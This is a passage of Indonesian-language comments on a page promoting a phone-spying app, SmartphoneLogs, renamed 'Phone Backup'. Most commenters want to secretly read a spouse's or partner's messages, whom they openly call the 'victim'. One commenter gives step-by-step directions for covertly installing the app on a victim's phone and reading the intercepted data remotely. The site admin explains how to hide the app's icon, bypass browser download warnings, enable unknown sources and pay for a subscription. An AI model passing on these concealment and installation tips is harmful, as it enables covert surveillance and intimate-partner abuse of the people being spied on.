    gimna min cara lihat aplikasinya yang sudah di download, di pengatura n aplikasi dan di menu aplikasi sama gak ada gimna solusinya?
    saya gunakn v.5

    07/03/2017
  127. lasix - pemalang

    Adminya ngga bertanggung jawab. Diperjelas dong cara bayar dan cara pakenya.

    04/03/2017
  128. ilham - sidoarjo

    Mas, kenapa kok di sony experia c1505 kok nggk bisa d pakai ??
    Tolong bantuannya mas, butuh banget soalnya

    23/02/2017
  129. vans - jakarta

    cara hapus aplikasi

    1. setting
    2. pengaman
    3.administrator perangkat
    4. hapus centang
    5. sekarang tombol uninstal sudah dapat dipencet

    22/02/2017
  130. kandar - surabaya

    KALAU INGIN COPOT PEMASANGAN. aplikasinya di non aktifkan dulu. Baru di copoy pemasangan

    22/02/2017
  131. bimbim - surabaya

    cara hapus aplikasinya gimana??
    saya udah hapus akun.nya..saya juga sudah coba hapus di pengaturan manager aplikasi juga tidak bisa..saya sudah restart bukan reset hpnya tp gak bisa.. mau menggunakan aplikasi root explorer hpnya blm di root..
    mohon jawabanya admin..
    sekian trimakasih..

    20/02/2017
  132. yoga - medan

    min, cara supaya bbm nya terbaca gimna ,gmnana juga cra membayar fiturnya agar bsa terbaca semua, apabila tidak mempunyai paypal ataupun kartu kredit, mohon saran min

    19/02/2017
  133. azas - wonosobo

    Kok pesan bbm gak kliatan..yg ada cm mesengger ma pemberithuan fb tok

    18/02/2017
  134. Nenglilis - Pekalongan

    Jika sudah bayar.. Apakah aplikasi seperti Wa,bbm, line dan medsos lain dapat terlihat oleh kita min..

    18/02/2017
  135. gery - bandung

    Jangan instal gan.emang sih apk nya bisa liat sms orang lain.tapi saya menemui masalah.apk versi 8.0 gabisa di uninstal.dan nama apk di manajer apk nya sama aja.saya udah udah coba beberapa kali hapus tetep gabisa

    17/02/2017
  136. Nurdin - Jakarta

    Gx sengaja device’a kehapus, cara balikin’a gmn ya min?

    16/02/2017
  137. syarif -

    cara pembayaranx gmn bos.dah experiet smatphone logx

    15/02/2017
  138. vhate - jakarta

    Saya nge download di hp sendiri :( cara hapus atau ilangin nya gmn ???
    Mksh

    15/02/2017
  139. ghodur - solo

    Msi bgung kyak e rumit pak e..sy bgung..gmn klau hp korban sy bwh ke bpk e tlong di aetingkan..nwun.

    13/02/2017
  140. Benogunawan - Cirebon

    Gmn sih cara nyh min ko susuah ya username sedang di lakukan trus
    Berbayar ga klo bayar gmn cara pembayaran nyh tolong ksih penjelasan

    13/02/2017
  141. bing - jakarta

    Jd smua pesan yg mw kita trima ada pket nya gt.. Gak ratis toh hoho

    11/02/2017
  142. supri - http://deleted.lampung

    Kenpa ya kalau buat liat panggilam gak bisa

    10/02/2017
  143. Alifya - Makassar

    Min .. Ada cara lain selain download apknya di hp korban soalnya korbannya jauh jarang banget ketemu

    09/02/2017
  144. aril - balikpapan

    saya kok tidak bisa melihat atau membaca pesan si target, yang terbaca yang membalas pesan si target, mohon bantuannya karena hp nya sudah ditangan target gak mungkin bisa di sett ulang. mohon bantuannya. tks

    08/02/2017
  145. santi - bogor

    Saya sudah download tapi ko pas saya cek sms nya… Kenapa sms saya yg keluar bukan data suami saya yg keluar

    08/02/2017
  146. Hengky kurniawan - Bekasi

    Butuh panduan buat download smartpohenelogs. Sbb yg muncul phonebackup. Bukan setting phone

    08/02/2017
  147. GITIE - cianjur

    percakapan WA & BBM ko gak muncul bos foto bisa muncul knpa bos….tolong solusinya bos ku…

    08/02/2017
  148. zulkarnain - magetan

    Bearty klok mau pkek ini harus bayar ya

    05/02/2017
  149. Yuni - Samarinda

    Gimana cara pembayarannya

    02/02/2017
  150. Ahmas - Mojokerto

    Kalo target ganti kartu ngaruh nggak yaa ?
    Trus apa solusinya agar tetap tersadap. Trmksh

    31/01/2017
  151. anto - jakarta

    saya mau buka hasil nya ko ga bisa yah

    31/01/2017
  152. YantoMRD - RANGKASBITUNG

    Kenapa setiapp saya klik download beralih ke play store?

    30/01/2017
  153. tyan - jambi

    Saya sudah download…tp tidak ada yg bisa saya lihat..semua nya kosong..mohon bantuanya..thank’s

    29/01/2017
  154. Adji raditya - Semarang

    Aplikasi ini sangatlah membantu….yg belum bisa saya bisa bantu pasang bisa hub no admin .trimakasih

    29/01/2017
  155. Lucky - Ambon maluki

    Yth. Admin
    Saya sh mendownld fersi baru tp ketika di minta massage bechup saya di alihkan ke aksebility. Mohon petnjuknya. Thx

    28/01/2017
  156. maroji - depok

    Sy ingin bw hp yg dimiliki oranng yg akan sya sadap ke anda, lalu berapa biaya’a ?

    27/01/2017
  157. mahmud - lamongan

    kenapa pesanya gak bisa keluar semua ,, fotonya juga gak bisa di buka

    26/01/2017
  158. bob - jakarta

    admin… mau tanya nih,. saya kok ga bisa lihat sent item (wa,bbm,messenger dll…) , tetapi kalo utk sms bisa semua mau sent item ataupun inbox bisa. makasih.. ditunggu jawabannya..

    cheers….

    25/01/2017
  159. Cecep - bandung

    mf gan mau tanya bisa ga klo dari jarak jauh nyadapnya soalnya sy jauh ma pacar

    25/01/2017
  160. Alam - Jakarta

    Gan.kok saya sudah pasang apknya di pacar sya trus gagal trus dah…

    23/01/2017
  161. A saja - Jateng

    Intinya gini temen2.
    Dihp korban pasangkam aplikasi ini. Kalo bs aplikasi yg versi 8.
    Kemudian ikuti tutorial nya utk pembuatan akun. Setelah hafalkan akun yg brusan dibuat di hp korban. Dan kmudian cek / mulai penyadapan di hp sendiri dg instal aplkasi trsbt juga. Lalu buat akun terserah kalian. Lalu masuk dan masukan akun yg sdh anda buat di hp korban.
    Hasilnya semua ketemu.. disarankan lewat google kalo mau ngecek

    21/01/2017
  162. syukron - bandung

    Gan gimana kalau ha masanh aplikasinya di korban .?

    17/01/2017
  163. syukron - makassar

    Om gimana kalau ga masang aplikasinya di korban . Masalahnya ga pernah ketemu . Mohon penjelasannya .

    17/01/2017
  164. Dyan - Duri

    Min..
    Kenapa gak bisa di uninstall?
    Soalnya udah gak bisa lagi login

    17/01/2017
  165. Asik - Bandung

    Gimana caranya supaya bisa gan

    17/01/2017
  166. lisa - tual

    Gan gmn carax tambah divices manageent di phonebackup ya gan.. mksh..

    12/01/2017
  167. lisa - tual

    Tanya dikit gan.. kl rubah device awal yg tdx samsung SM-G351H skrg jd SM-J200G.. kita mo kembalikan ke SM-G351H gmn gan ya.. thks..

    12/01/2017
  168. yusri - bandung

    Mim..gimana kalo hp korban itu di restart semua apk nya atau di kembalikan ke pemgaturan pabrik. Apa kita masih bisa nyadap.??

    11/01/2017
  169. naufal - madiun

    Susah …liat hasilnya min…apa ada onkosnya

    08/01/2017
  170. Messy - Bengkulu

    Gan kenapa pesan nya gx selalu masuk yg baru.terakhir pesan bisa dilihat jm 5 sore.sedangkan saya aja inbox sama korban yg disadap dari jm 5 an sampe mlm.tapi kenapa gx ada pembaruan gàn mohon dijelaskan.padahal saya yakin klw aplikasinya masih ada sama korban.

    08/01/2017
  171. ancha alfar - watampone

    Bagaimana prosedurnya untuk berlangganan, min
    Mhn kirim keterangan ke Email saya ancha72@yahoo.com

    07/01/2017
  172. Warno - Jakarta

    Min. Minta bantuan cara pembayarannya.. .

    03/01/2017
  173. heldar - jombang

    min cara bayar gmn min pakai aplikasi ini?? penting min, gk punya cc sm paypal

    30/12/2016
  174. fifin - surabaya

    Mohon info bagaimana cara berhenti berlangganan smartphonelog, ke saya hanya pakai 1 bulan pembayaran melalui visa, mengapa tagihannya setiap bulanmuncul terus

    29/12/2016
  175. riri - bandung

    Min ko pesan yg masuk nya ga bisa ke deteksi lagi sih padahal kemaren lancar aja. Mohon penjelasan nya yaa

    27/12/2016
  176. Dhan - Lampung

    Gan…saya udah instal barusan d HP versi 8 dan sebelumnya saya pernah instal versi 5.0…
    Setelah saya update koq menu pada pesan tidak ada pesan2 sprti WA,bbm,FB dll muncul pesan “No Massege uploaded yet”

    Mhon solusi gan, sy jg udah ikut bayar paket premium membership dan notifikasi

    26/12/2016
  177. Arman - Cikampek

    Gan,kalau mau menyadap tanpa memasang aplikasi ini di hp korban bisa gk….????
    Masalahnya aku jarang ketemu….aku di malaysia dan korbannya di indonesia….bisa gk tuh…tolong ya gan….aku mau nglacak hp istriku…

    26/12/2016
  178. Admin -

    Cika: Iya sekarang pakai brand baru “Phone Backup” setelah rilis versi 8 (terbaru). Ikon bisa dihilangkan, silakan login setelah itu masuk pengaturan edit phone. Ceklis pada “hide icon” lalu simpan.

    23/12/2016
  179. Cika - Pontianak

    Gan mau tanya smartphonelogs ganti nama jd phone backup ya? Kok stlh diinstal jd brubah nama trus icon aplikasinya ga bisa disembunyikan juga.mhn pnjlsan ya gan.terima kasih

    22/12/2016
  180. Yanto - Banten

    Gmna cara aktifkan premium membership

    21/12/2016
  181. gendis - surabaya

    Klu ganti hp no hp tetap apa perlu donwload kembali smatphonelogs?.trimks

    20/12/2016
  182. Dodi - Jakarta

    Bos.. mau tanya.. kalo hp kita di sadap orang.. atau pernah di pasang phone setting oleh seseorang.. terus kita sudah upgrade ponsel kita.. apakah aplikasi penyadap itu masih ada dan berfungsi? Thanks

    19/12/2016
  183. lusi - palembang

    apabila sdh mendowload rupanya gak bisa buka…apakah boleh lagi download ulang….

    19/12/2016
  184. Arie - Bandung

    Mohon info gan,kok ga bisa di download hari ini ya, tulisan muncul status hp d lindungi pd selama ini lncar aja.

    18/12/2016
  185. Ardi - Palembang

    Mau bayar gan…bisa di bantu..?

    18/12/2016
  186. Noviyanti - cianjur

    min bisa ga kalau apk nya ga dipasang dihp korban ada yang lain ga apknya soalnya saya ketemunya jarang dan susah banget kalau harus masangin apk smartphonelogs d hpnya dia

    16/12/2016
  187. ayu - karawang

    Min knpa gak bisa d buka yaa smartphone logs nya pdahal baru td mlm d download lancar2 saja.
    Dan kalo sudah lewat dua hari apakah saya tidak bisa memakai app ini?
    Adapaket apa ajh kalo mau bayar?
    Trmakasih dan mohon bantuan nya

    15/12/2016
  188. tristancenk - surabaya

    Gan padahal saya sdh daftar

    Trs saya masukan user sama paswortx itu sama yg saya daftarkan tapi xtax kok g bisa masuk”…
    2hr enk stlh 14 hr g bisa masuk

    14/12/2016
  189. admin -

    wiswan & Adrian: Iya website smartphonelogs lagi down, tadi malam mulai tidak bisa dikases terus pagi ini bisa diakses lagi, tapi sayang sekarang tidak bisa diakses lagi.
    Tunggu saja ya, sepertinya lagi diperbaiki sama pihak terkait.

    14/12/2016
  190. wiswan - makassar

    Min kok situsnya nga bisa dibuka kmarin2 bisa kok

    14/12/2016
  191. Adrian - Jakarta

    Kok udah berapa jam ini saya ga bisa akses web smartphonelogs ya min? Keterangannya Service Unavailable. Mohon solusinya min

    14/12/2016
  192. obang - bandung

    min. ane bingung nih cara pmbayaran nya gmn?

    10/12/2016
  193. Devi - Surabaya

    Saya download susah sekali Min
    Download kelar, tp saat memasang gak bisa dibuka.

    09/12/2016
  194. admin -

    Agus: Kalau download menggunakan chrome atau firefox emang susah karena dianggap membahayakan. Coba download langsung menggunakan browser bawaan android. Kalau tetap tidak bisa coba download lewat link dropbox di atas.

    Devi: Kalau sudah terdowmload jangan lupa centang opsi unknown sorce/sumber tidak dikenal di pengaturan keamanan di android.

    Obang: Untuk pembayaran bisa pakai jasa di situs ini gan. Perpaket harganya 170rb untuk berlangganan 1 bulan. Ada paket premium membership dan layanan perpesanan.

    09/12/2016
  195. Agus - Samarinda

    Susah sekali mendwonlod aplikasi ini mohon penjelasanya tks

    09/12/2016
  • Beri Komentar